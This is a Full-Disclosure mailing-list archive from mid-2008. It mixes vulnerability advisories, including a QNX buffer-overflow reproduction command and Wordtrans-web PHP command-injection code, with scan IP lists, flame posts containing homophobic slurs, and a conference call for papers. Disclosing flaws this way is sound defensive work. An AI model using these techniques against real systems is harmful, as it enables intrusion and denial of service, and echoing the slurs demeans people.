From jlay at slave-tothe-box.net Tue Jul 1 00:22:21 2008 From: jlay at slave-tothe-box.net (James Lay) Date: Mon, 30 Jun 2008 17:22:21 -0600 Subject: [Full-disclosure] Recent SSH Scan IP's Message-ID: For those that care...it?s just a list of the recent SSH scan storm that?s been happening the last couple days..pulled fresh from the log files today. Enjoy if it?s useful to you, pretend this never happened if not. James 122.52.185.49 124.30.157.4 134.34.57.150 140.114.75.12 147.99.127.82 157.22.252.78 168.243.151.152 190.86.193.55 193.144.34.220 193.16.208.146 194.29.49.1 195.168.193.227 195.252.122.144 196.211.53.74 196.211.8.90 196.44.177.69 200.13.185.34 200.141.223.99 200.152.223.219 200.164.216.114 200.204.108.200 200.21.231.45 200.241.99.51 200.51.40.154 200.67.193.252 201.216.249.77 201.227.191.115 201.28.213.252 201.37.67.184 202.71.216.126 203.80.236.60 213.135.245.251 213.23.193.42 213.81.133.135 213.96.219.200 217.110.123.114 217.221.55.220 218.65.104.102 58.172.65.98 62.131.15.122 62.147.149.124 62.147.239.186 62.178.7.225 62.2.155.164 62.2.211.46 62.45.17.146 66.159.198.155 67.103.112.92 67.53.204.14 74.93.25.42 75.127.108.26 76.233.35.22 80.153.2.144 80.254.182.86 80.74.148.181 81.183.216.146 81.5.160.149 81.7.92.17 82.144.211.42 82.88.55.72 83.12.137.44 83.15.23.250 83.15.246.226 83.17.126.94 83.208.41.97 84.199.17.218 84.242.66.10 87.139.118.233 87.30.163.87 88.103.123.217 88.247.87.69 88.82.39.76 91.147.232.37 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080630/347c36ff/attachment.html From aluigi at autistici.org Tue Jul 1 01:52:44 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Tue, 1 Jul 2008 01:52:44 +0100 Subject: [Full-disclosure] Endless loop in Soldner 33724 Message-ID: <20080701015244.3dbd600e.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: S?LDNER - Secret Wars http://www.secretwars.net http://soldner.jowood.com Versions: <= 33724 Platforms: Windows Bug: endless loop Exploitation: remote, versus server Date: 01 Jul 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== S?LDNER is a tactical military game developed by Wings Simulations and released in May 2004. ####################################################################### ====== 2) Bug ====== Each UDP packet for this game can contain various blocks of data. The type 0x80 forces the server to perform a cycle from zero to the 32 bit number (so max 0xffffffff) specified in that data block. The maximum size of a packet supported by the game is 1400 bytes in which is possible to place max 233 blocks of this type causing the freeze of a server for over 2 hours (tested with a fast CPU). ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/usurdat.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From ivanhec at gmail.com Tue Jul 1 02:51:49 2008 From: ivanhec at gmail.com (Ivan .) Date: Tue, 1 Jul 2008 11:51:49 +1000 Subject: [Full-disclosure] I've Seen the Future, and It Has a Kill Switch Message-ID: <6450e99d0806301851k5e328660l3b4f4fb46e67ec8f@mail.gmail.com> http://www.wired.com/politics/security/commentary/securitymatters/2008/06/securitymatters_0626 From ureleet at gmail.com Tue Jul 1 04:52:35 2008 From: ureleet at gmail.com (Ureleet) Date: Mon, 30 Jun 2008 23:52:35 -0400 Subject: [Full-disclosure] Save Gary Mckinnon In-Reply-To: <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9@mail.gmail.com> References: <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9@mail.gmail.com> Message-ID: <6158bb410806302052x14999105t56e281ce6cc4cf8b@mail.gmail.com> apparently you have no idea what gary mckinnon did. you need to read some more articles. On Sun, Jun 29, 2008 at 10:04 PM, n3td3v wrote: > Gary Mckinnon is going to be locked away for 64 years for doing a default > password scan of the U.S military. > > We need to save this guys life, yes he was stupid, yes he was dumb, yes he > shouldn't have done it. > > He is a weirdo who tried to find out about UFO research within military > ranks, should we send Gary Mckinnon away the same as a suicide bomber > terrorist? > > The U.S military are going to make an example of this man, an example that > is unjust, we need to save Gary, save Gary... save Gary! > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Everhart at gce.com Tue Jul 1 03:58:53 2008 From: Everhart at gce.com (Mary and Glenn Everhart) Date: Mon, 30 Jun 2008 22:58:53 -0400 Subject: [Full-disclosure] "what have you released..." In-Reply-To: References: Message-ID: <48699D6D.2020304@gce.com> full-disclosure-request at lists.grok.org.uk wrote: > Send Full-Disclosure mailing list submissions to > full-disclosure at lists.grok.org.uk > > To subscribe or unsubscribe via the World Wide Web, visit > https://lists.grok.org.uk/mailman/listinfo/full-disclosure > or, via email, send a message with subject or body 'help' to > full-disclosure-request at lists.grok.org.uk > > You can reach the person managing the list at > full-disclosure-owner at lists.grok.org.uk > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of Full-Disclosure digest..." > > > Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. > > > Today's Topics: > > 1. Fwd: what problem are we solving? (was Re: ICANN opens up > Pandora'sBox of (n3td3v) > 2. Re: Gadi Evron is a troll (Th3 M0ths) > 3. Save Gary Mckinnon (n3td3v) > 4. Re: Let's make a spy-proof communications infrastructure > (Jubei Trippataka) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sun, 29 Jun 2008 23:49:08 +0100 > From: n3td3v > Subject: [Full-disclosure] Fwd: what problem are we solving? (was Re: > ICANN opens up Pandora'sBox of > To: full-disclosure at lists.grok.org.uk > Message-ID: > <4b6ee9310806291549w40aefeebqde4c3b5ace15895d at mail.gmail.com> > Content-Type: text/plain; charset="iso-8859-1" > > Classic Gadi Evron Gayness! He's currently trolling the I.S.P community via > NANOG mailing list. > > "Because the Internet is not governemned, common misbelief aside. It's a > mess of capitalism and anarchism. In fact, The Internet is the only > functioning anarchu." > > Hilarious TROLLING effort by Gadi, keep up the good work. > > All the best, > > n3td3v > > ---------- Forwarded message ---------- > From: Gadi Evron > Date: Sun, Jun 29, 2008 at 9:42 PM > Subject: Re: what problem are we solving? (was Re: ICANN opens up > Pandora'sBox of > To: Jim Popovitch > Cc: nanog at nanog.org > > > On Sun, 29 Jun 2008, Jim Popovitch wrote: > > >> On Sun, Jun 29, 2008 at 1:21 PM, Peter Beckman >> wrote: >> >> >>> Let the search engines organize the web, not DNS. >>> >>> >> OK, (assuming you believe that), why keep dns around. Why not go back >> to just IP addrs and hosts files for those that need them. >> >> > > Because the Internet is not governemned, common misbelief aside. It's a mess > of capitalism and anarchism. In fact, The Internet is the only functioning > anarchu. > > I see no reason why search engines won't, they already do, whether we want > to admit it or not, for the home user they ARE the Internet. > > Gadi. > > -Jim P. > >> > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080629/e0723779/attachment-0001.html > > ------------------------------ > > Message: 2 > Date: Sun, 29 Jun 2008 19:30:54 -0400 > From: "Th3 M0ths" > Subject: Re: [Full-disclosure] Gadi Evron is a troll > To: full-disclosure at lists.grok.org.uk > Message-ID: > <1204677e0806291630j7b1045f0tff319c05dfa1f286 at mail.gmail.com> > Content-Type: text/plain; charset=ISO-8859-1 > > Homosapien? I'm pretty sure he is a human. > > On Sun, Jun 29, 2008 at 2:39 PM, n3td3v wrote: > >> On Sun, Jun 29, 2008 at 7:29 PM, Ureleet wrote: >> >>> dont start, you were just getting good! >>> >> What do you mean getting good, i've been good the whole time homo! >> >> All the best, >> >> n3td3v >> >> >>> 2008/6/29 n3td3v : >>> >>>> Gadi Evron is a troll >>>> >>>> _______________________________________________ >>>> Full-Disclosure - We believe in it. >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>> Hosted and sponsored by Secunia - http://secunia.com/ >>>> >>>> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> > > > > ------------------------------ > > Message: 3 > Date: Mon, 30 Jun 2008 03:04:42 +0100 > From: n3td3v > Subject: [Full-disclosure] Save Gary Mckinnon > To: full-disclosure at lists.grok.org.uk > Message-ID: > <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9 at mail.gmail.com> > Content-Type: text/plain; charset="iso-8859-1" > > Gary Mckinnon is going to be locked away for 64 years for doing a default > password scan of the U.S military. > > We need to save this guys life, yes he was stupid, yes he was dumb, yes he > shouldn't have done it. > > He is a weirdo who tried to find out about UFO research within military > ranks, should we send Gary Mckinnon away the same as a suicide bomber > terrorist? > > The U.S military are going to make an example of this man, an example that > is unjust, we need to save Gary, save Gary... save Gary! > > All the best, > > n3td3v > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080630/7c328d1b/attachment-0001.html > > ------------------------------ > > Message: 4 > Date: Mon, 30 Jun 2008 13:35:08 +1000 > From: "Jubei Trippataka" > Subject: Re: [Full-disclosure] Let's make a spy-proof communications > infrastructure > To: full-disclosure at lists.grok.org.uk > Message-ID: > <1c27cb9a0806292035s2aac3c27k73d68decd87d7d90 at mail.gmail.com> > Content-Type: text/plain; charset="iso-8859-1" > > >> Yes as i've been saying already the intelligence services for years like >> MI5, MI6 have been laughing at Full-Disclosure for years about us and the >> media getting excited about internet explorer, fire fox, opera, safari drama >> and the other likes. >> >> While that may be stimulating for some, it hasn't chipped a single inch out >> of the government and the intelligence services. >> >> The biggest government hack of all time? Some faggot weirdo called Gary >> Mckinnon probing the Pentagon and other government networks with a text file >> of manufacturer default passwords, and he is about to be extradited to the >> U.S.A for it and be put in jail for 65 years, lmao!!! >> >> The government are laughing their asses off at how softcore the world elite >> hackers are, we need to crank up a gear and give the government something to >> think about. >> >> I'm not talking about anything illegal or breaking the law, i'm talking >> about lawful critical vulnerability discosure on the mailing lists thats >> going to make the intelligence services and the government wake up and bring >> real credibility to the mailing list. >> >> Right now, folks releasing quicktime flaws and other gay shit, thats so >> 1999, its time to research and disclose stuff thats going to get you stopped >> at passport control and have your vulnerability research taken off you for >> analysis when you plan to do a speech at a security conference etc. >> >> Like say, we need to move away from gay shit, and think about the >> government and the intelligence services, they are currently walking all >> over all of us, its time to get even technically. >> >> All the best, >> >> n3td3v >> >> >> > Put your money where your mouth is. What have you released that will make > the government respect this list? > > Secondly, what does FD and the "world of elite hackers" have in common? > Nothing. > > I might ask the same question of others. I have released encrypting virtual disks and a distributed multilevel secure kernel (back in 1979) with sources published back then. I have released code for extended authorization controls with a half decent initial approach to controlling mobile code, back in the 1990s again with source code. I have described a few generic defenses against injection attacks and buffer overflows. No matter; this is pointless. Reciting lists of old software (or hardware) is IMO only useful where contemporary problems might be addressed by that software or its methods (or perhaps when some Johnny come lately tries to patent ideas published decades before). However the personal attacks are childish and of no interest to me (or, I suspect, to very many others) and distract from the technical question which in this case I tried to pose and which I meant for serious consideration. It is easy to offer opinions about some political issue. It is not so easy to offer designs. Yet designs for a communication system that will vitiate surveillance and frustrate control freaks may be a great value to all. Publishing THAT kind of article will impress, and deserve honor and praise. If you must think of such as a form of hacking, think of it as hacking whole government agencies all at once, or hacking scores of fraudsters, again all at once. But can we have technical commentary? Or is this the wrong group? thanks Glenn Everhart From tonnerre.lombard at sygroup.ch Tue Jul 1 07:34:52 2008 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Tue, 1 Jul 2008 08:34:52 +0200 Subject: [Full-disclosure] so this is FD... In-Reply-To: References: Message-ID: <20080701083452.07c0952d@wssyg117.sygroup-int.ch> Salut, Lucio Crusca, On Fri, 27 Jun 2008 08:46:19 +0000, Lucio Crusca wrote: > I've been reading bugtraq in several short periods of my life, from Please note that the idea behind full-disclosure and bugtraq is quite a bit different, so you cannot really compare the two. Basically it boils down to: on bugtraq, someone is filtering for you while on f-d, you are responsible to do it yourself. > after a few months of FD reading, I feel bored again. I've never > replied to any of the trolls and trolls-feeders on this list, but > I've always been hardly hoping it was a transient situation, not the > main (and sometimes only) topic of the list. Hell, if you filter out You should consider the constant trolling as "line noise". I have found that an IMAP folder specific bayesian SPAM filter serves quite well to filter out the discussions on this list not worth reading. But of course then you're basically down to advisories and occasional interesting discussions taking place every other month. However, with the appropriate amount of recipient-side filtering, full-disclosure is actually quite readable. Like Wau Holland used to say, the world usually gets better when you learn to adjust your filters. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 G?terstrasse 86 Fax:+41 61 383 14 67 4053 Basel Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 835 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/833950dd/attachment.bin From staff at lul-disclosure.net Tue Jul 1 02:57:29 2008 From: staff at lul-disclosure.net (staff) Date: Mon, 30 Jun 2008 21:57:29 -0400 Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. Message-ID: Are you ready for a site that isn't full of fagottry? Where Gadi cant steal your money or eat your lunches? Where you can freely submit lulz to be published? Where Theo's defeat and denial are brought to light? Wait no more! http://lul-disclosure.net/ WhiteHat? BlackHat? We are lulzhat. Fuck you and your hats. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080630/fc5594da/attachment.html From lists at foo.io Tue Jul 1 09:32:34 2008 From: lists at foo.io (fukami) Date: Tue, 1 Jul 2008 10:32:34 +0200 Subject: [Full-disclosure] CFP 25C3 - The 25th Chaos Communication Congress 2008 Message-ID: <07843905-9035-4C9E-B0C5-36AE1822EDB9@foo.io> The 25th Chaos Communication Congress (25C3) ============================================ is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it since has established itself as "The European Hacker Conference", attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. We want you to join and be a part of this unique event which serves as a public platform for cross-culture inspiration and borderless networking. 25C3 is fun! Topics ====== The 25C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration. Hacking ------- The "Hacking" category addresses topics dealing with technology, concentrating on current research with high technical merit. Traditionally, the majority of all lectures at 25C3 revolve around hacking. Topics in this domain include but are in no way limited to: programming, hardware hacking, cryptography, network and system security, security exploits, and creative use of technology. Making ------ The "Making" category is all about making and breaking things and the wonderful stuff you can build in your basement or garage. Most welcome are submissions dealing with the latest in electronics, 3D-fabbing, climate-change survival technology, robots and drones, steam machines, alternative transportation tools and guerilla-style knitting. Science ------- The "Science" category covers current or future objects of scientific research that have the potential to radically change our lives, be it basic research or projects conducted for the industry. We are looking for talks and papers on the state of the art in this domain, covering subjects such as nano technology, quantum computing, high frequency physics, bio-technology, brain-computer interfaces, automated analysis of surveillance cctv, etc. Society ------- Technology development causes great changes in society and will determine our future. This category is for all talks on subjects like hacker tools and the law, surveillance practices, censorship, intellectual property and copyright issues, data retention, software patents, effects of technology on kids, and the impact of technology on society in general. Culture ------- Shaping the world we live in means making it more interesting, entertaining and beautiful. The hacker culture has many facets ranging from electronic art objects, stand-up comedy, geek entertainment, video game and board game culture, music, 3D art to e-text literature and beyond. If you like to show your art and teach others how to make their lives more enjoyable, this category is for you. Community --------- In addition to individual speakers the Chaos Communication Congress is also inviting groups such as developer teams, projects and activists to present themselves and their topics. Developer groups are also encouraged to ask for support to hold smaller on-site developer conferences and meetings in the course of the Congress. Further Information =================== The Chaos Communication Congress is a non-profit oriented event and speakers are not paid. However, financial help on travel expenses and accommodation is possible. It needs to be agreed upon after acceptance of the submission, though. Don't be shy and state your requirements in the application when submitting your lecture and we'll work something out! You can find the preliminary agenda and additional information on our 25C3 website at http://events.ccc.de/congress/2008/. For further information and questions please feel free to contact 25c3-content at cccv.de Submissions =========== All proposals must be submitted online using our online lecture submission system at https://cccv.pentabarf.org/submission/25C3. Please follow the instructions given there. If you have any questions regarding your submission, feel free to contact us at 25c3-content at cccv.de but do NOT submit your lecture via e-mail. Language ======== 25C3 is an international event and we want to have a lot of interesting talks in English for the benefit of our growing number of international guests. So ideally we are looking for speakers who can give lectures and/or workshops in either English or German. But while we are interested in maximizing the quality of presentations, the topic and its relevance to our community are our main concern. So don't worry about your English skills: the language of a submission is not a criteria for accepting or rejecting it! If you feel insecure talking in English, have received criticism on your language skills from your audience before, or if you just fear that the value and understandability of your lecture might suffer, please offer your talk in German. Please tell us if you are a native speaker of English or have similar skills, when submitting your lecture. Papers ====== Accepted speakers can optionally hand in a paper which will be published with an ISBN in the 25C3 Proceedings. Papers will be accepted in Portable Document Format (PDF) only and should be around 5 pages. The PDF file must not be password-protected or contain other restrictions. Paper size should be DIN A4 in portrait orientation. All margins must be set to at least 2 cm (0.78 inches). Pictures should be greyscale and up to 300dpi. Apart from that, you are free to use any layout you want. Slides ====== Accepted speakers are asked to hand in slides used in their talks. Please use a well-known format for your slides. Publication =========== Audio and video recordings of the lectures will be published online in various formats. The Chaos Communication Congress Proceedings are published on paper and online. Only reviewed and accepted talks and presentations will be published. All material will be available under the Creative Commons Attribution-NonCommercial-NoDerivs 2.0 Germany (BY-NC-ND) license allowing free non-commercial redistribution of the material as long as the original credit to authors and publishers is retained. Licence URI: http://creativecommons.org/licenses/by-nc-nd/2.0/de/ We encourage contributors to publish their work under a more liberal license; if you wish to do so, please state this with your submission. Dates and Deadlines =================== The deadline for submission is October 5th, 2008 Midnight (23:59) UTC. Notification of acceptance will be sent by e-mail on November 7th, 2008 the latest. However, you may very well get your notification earlier than that if needed. Final papers or slides are due by November 18th, 2008. - October 5th, 2008 (Midnight UTC) Submission due - November 7th, 2008 (Midnight UTC) Final notification of acceptance (or earlier) - November 28th, 2008 (Midnight UTC) Final papers due - December 27th - 30th, 2008 Chaos Communication Congress Lecture Requirements ==================== Lectures should not exceed 45 minutes plus up to 10 minutes for questions and answers. Longer time slots are possible if we feel the topic demands it (please tell us if necessary). Workshops should include a talk on the basic principles in the lecture programm and a practical hands-on session in the workshop room. Criteria which must be met to consider a lecture ================================================ - submission is in time - for the event all fields in the general and the description tab are filled out - for the person all fields in the descripion tab are filled out Criteria by which we assess a lecture ===================================== - we consider the topic in general relevant for the participants - we consider the topic currently relevant for the participants - we consider the topic interesting, fun and worthy to be known more about - the lecture is about something the speaker made himself - we think the lecture might be fun - the lecture is part of a workshop (has a second part which is a workshop) - the lecture presents something new - the more information provided about the lecture and the speaker the better Criteria by wich we NOT assess a lecture ======================================== - the language - need for financal help on travel expenses From research at scanit.net Tue Jul 1 05:25:17 2008 From: research at scanit.net (Scanit Labs) Date: Tue, 01 Jul 2008 08:25:17 +0400 Subject: [Full-disclosure] [SCANIT-2008-002] Wordtrans-web Remote Command Execution Vulnerability Message-ID: <1214886317.18366.14.camel@realvirtuality> Wordtrans-web Remote Command Execution Vulnerability Scanit R&D Labs Security Advisory http://www.scanit.net/rd/advisories/ Jun 30, 2008 Filename: SCANIT-2008-002.txt SCANIT ID: SCANIT-2008-002 Published: June 30th, 2008 I. Summary Wordtrans is a free front-end graphical application that allows you to look for words in several dictionaries. It can also translate the word that the user selects with his mouse. The latest Wordtrans version could allow a remote attacker to execute arbitrary code in the server, caused by an input validation error in the wordtrans-web package, which is a PHP-based Web interface for Wordtrans. II. Affected Products This vulnerability affects the wordtrans 1.1pre15 and probably previous versions. III. Details By Sending a GET request with the variable "command" set to 'show_desc', the variable "link_options" receives one argument from the user, passed via the "advanced" variable using the GET method. Then, the variable "link_options" is concatenated with the variable "exec_wordtrans". Since "exec_wordtrans" is passed to the function "passthru" without checking for special characters, an attacker can send shell characters like | or ; to execute commands in the machine with the privileges of the Web server process at the time the URL is submitted. This is part of vulnerable script from wordtrans 1.1pre15: ... $exec_wordtrans = $wordtrans . "-d \"$dict\" "; switch ($_GET['command']) { case "show_desc": $exec_wordtrans .= "--desc "; $link_options = "--html-link-options \"?lang= $lang_case&advanced=".$_GET['advanced']."&\" "; $exec_wordtrans .= $link_options; passthru($exec_wordtrans); break; ... To exploit this vulnerability, the "Magic Quotes" option needs to be unset. But since this option was removed from PHP since version 6.0.0, this is a critical vulnerability. IV. Solution No vendor response. V. Timeline March 1st, 2008 - Vulnerability discovery March 24th, 2008 - First contact attempt June 30th, 2008 - Advisory release VI. Credits This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon) . VII. Contact Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest deffensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution. Reach us at research at scanit.net Visit http://www.scanit.net VIII. Disclaimer The information contained in this document may change without notice. Use of this information constitutes acceptance for use in an "AS IS" condition. There are no warranties regarding the topicality, correctness, completeness or quality of the information provided by this document. Under no circumstances shall the authors be held liable for any direct, indirect, or consequential damages, losses, injuries, or unlawful offences allegedly arising from the use of this information. Copyright 2008 Scanit Middle East FZ/LLC From research at scanit.net Tue Jul 1 05:25:21 2008 From: research at scanit.net (Scanit Labs) Date: Tue, 01 Jul 2008 08:25:21 +0400 Subject: [Full-disclosure] [SCANIT-2008-003] Wordtrans-web Remote Command Execution Vulnerability Message-ID: <1214886321.18366.15.camel@realvirtuality> Wordtrans-web Remote Command Execution Vulnerability Scanit R&D Labs Security Advisory http://www.scanit.net/rd/advisories/ Jun 30, 2008 Filename: SCANIT-2008-003.txt SCANIT ID: SCANIT-2008-003 Published: June 30th, 2008 I. Summary Wordtrans is a free front-end graphical application that allows you to look for words in several dictionaries. It can also translate the word that the user selects with his mouse. The latest Wordtrans version could allow a remote attacker to execute arbitrary code in the server, caused by an input validation error in the wordtrans-web package, which is a PHP-based Web interface for Wordtrans. II. Affected Products This vulnerability affects the wordtrans 1.1pre15 and probably previous versions. III. Details When sending a request without the variable "command" or with an undefined command and any word in the variable "word", the variable "link_options" receives one argument from the user, passed with the "advanced" variable using the POST method. Then, the variable "link_options" is concatenated with the variable "exec_wordtrans". Since "exec_wordtrans" is passed to the function "passthru" without checking for special characters, we can send shell characters like | or ; to execute commands in the machine with privileges of the Web server process when the URL is submitted. This is part of vulnerable script from wordtrans 1.1pre15: ... $exec_wordtrans = $wordtrans . "-d \"$dict\" "; switch ($_GET['command']) { ... default: if ($_POST['word'] != "") { if ($_POST['fullwords']) $exec_wordtrans .= " +w "; else $exec_wordtrans .= " -w "; if ($_POST['casesensitive']) $exec_wordtrans .= " +c "; else $exec_wordtrans .= " -c "; if ($_POST['invertir']) $exec_wordtrans .= " +i "; else $exec_wordtrans .= " -i "; if ($_POST['noacentos']) $exec_wordtrans .= " +g "; else $exec_wordtrans .= " -g "; $link_options = "--html-link-options \"?lang= $lang_case&advanced=".$_POST['advanced']."&\" "; $exec_wordtrans .= $link_options; $exec_wordtrans .= "\"".$_POST['word']."\""; passthru($exec_wordtrans); ... To exploit this vulnerability, the "Magic Quotes" option needs to be unset. But since this option was removed from PHP since version 6.0.0, this is a critical vulnerability. IV. Solution No vendor response. V. Timeline March 10th, 2008 - Vulnerability discovery March 24th, 2008 - First contact attempt June 30th, 2008 - Advisory release VI. Credits This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon) . VII. Contact Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest deffensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution. Reach us at research at scanit.net Visit http://www.scanit.net VIII. Disclaimer The information contained in this document may change without notice. Use of this information constitutes acceptance for use in an "AS IS" condition. There are no warranties regarding the topicality, correctness, completeness or quality of the information provided by this document. Under no circumstances shall the authors be held liable for any direct, indirect, or consequential damages, losses, injuries, or unlawful offences allegedly arising from the use of this information. Copyright 2008 Scanit Middle East FZ/LLC From research at scanit.net Tue Jul 1 05:25:12 2008 From: research at scanit.net (Scanit Labs) Date: Tue, 01 Jul 2008 08:25:12 +0400 Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability Message-ID: <1214886312.18366.13.camel@realvirtuality> QNX phgrafx Privilege Escalation Vulnerability Scanit R&D Labs Security Advisory http://www.scanit.net/rd/advisories/ Jun 30, 2008 Filename: SCANIT-2008-001.txt SCANIT ID: SCANIT-2008-001 Published: June 30th, 2008 I. Summary QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. From QNX's website: "Companies worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on the QNX technology for network routers, medical devices, intelligent transportation systems, safety and security systems, next-generation robotics, and other mission-critical applications. In addition, QNX forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an engineering concept vehicle. The new system supports the development of next-generation in-car communications, infotainment, and telematics applications." More information is available at http://www.qnx.com/products/rtos/. Local exploration of a buffer overflow vulnerability inside /usr/photon/bin/phgrafx included by default in QNX RTOS latest version (6.3.2) could allow an attacker to gain root privileges. II. Affected Products Scanit has confirmed the existence of this vulnerability in QNX RTOS 6.3.2 and QNX RTOS 6.3.0. Probably previous versions are vulnerable too. III. Details The vulnerability itself exists due to improper handling of the PHOTON_PATH/palette/*.pal file. When a filename greater than 285 characters is created with the extension .pal in the directory "palette", a stack-based overflow occurs, allowing the attacker to control program flow. # PHOTON_PATH=/tmp # cd /tmp # mkdir palette # cd palette # touch `perl -e 'print "A" x 290 . ".pal"'` # /usr/photon/bin/phgrafx Memory fault (core dumped) # IV. Solution According to the vendor's response: "QNX Software Systems confirms this vulnerability in Momentics 6.3.2 and earlier versions. The phgrafx binary is to be deprecated in future releases. For the time being, it is recommended that the user clear the set user ID bit from the file permissions. If this is done, only the root user may change the graphics configuration." V. Timeline February 20th, 2008 - Vulnerability discovery March 24th, 2008 - First contact attempt March 27th, 2008 - Vendor response June 30th, 2008 - Advisory release VI. Credits This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon) . VII. Contact Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest deffensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution. Reach us at research at scanit.net Visit http://www.scanit.net VIII. Disclaimer The information contained in this document may change without notice. Use of this information constitutes acceptance for use in an "AS IS" condition. There are no warranties regarding the topicality, correctness, completeness or quality of the information provided by this document. Under no circumstances shall the authors be held liable for any direct, indirect, or consequential damages, losses, injuries, or unlawful offences allegedly arising from the use of this information. Copyright 2008 Scanit Middle East FZ/LLC From keytoaster at gentoo.org Tue Jul 1 12:51:43 2008 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Tue, 01 Jul 2008 13:51:43 +0200 Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer overflows Message-ID: <486A1A4F.1080404@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: Multiple integer overflows Date: July 01, 2008 Bugs: #216673, #217221 ID: 200807-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple integer overflows may allow for Denial of Service. Background ========== Python is an interpreted, interactive, object-oriented programming language. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6 >= 2.4.4-r13 Description =========== Multiple vulnerabilities were discovered in Python: * David Remahl reported multiple integer overflows in the file imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679). This issue is due to an incomplete fix for CVE-2007-4965. * Justin Ferguson discovered that an integer signedness error in the zlib extension module might trigger insufficient memory allocation and a buffer overflow via a negative signed integer (CVE-2008-1721). * Justin Ferguson discovered that insufficient input validation in the PyString_FromStringAndSize() function might lead to a buffer overflow (CVE-2008-1887). Impact ====== A remote attacker could exploit these vulnerabilities to cause a Denial of Service or possibly the remote execution of arbitrary code with the privileges of the user running Python. Workaround ========== There is no known workaround at this time. Resolution ========== The imageop module is no longer built in the unaffected versions. All Python 2.3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6" All Python 2.4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13" References ========== [ 1 ] CVE-2008-1679 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679 [ 2 ] CVE-2008-1721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721 [ 3 ] CVE-2008-1887 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment 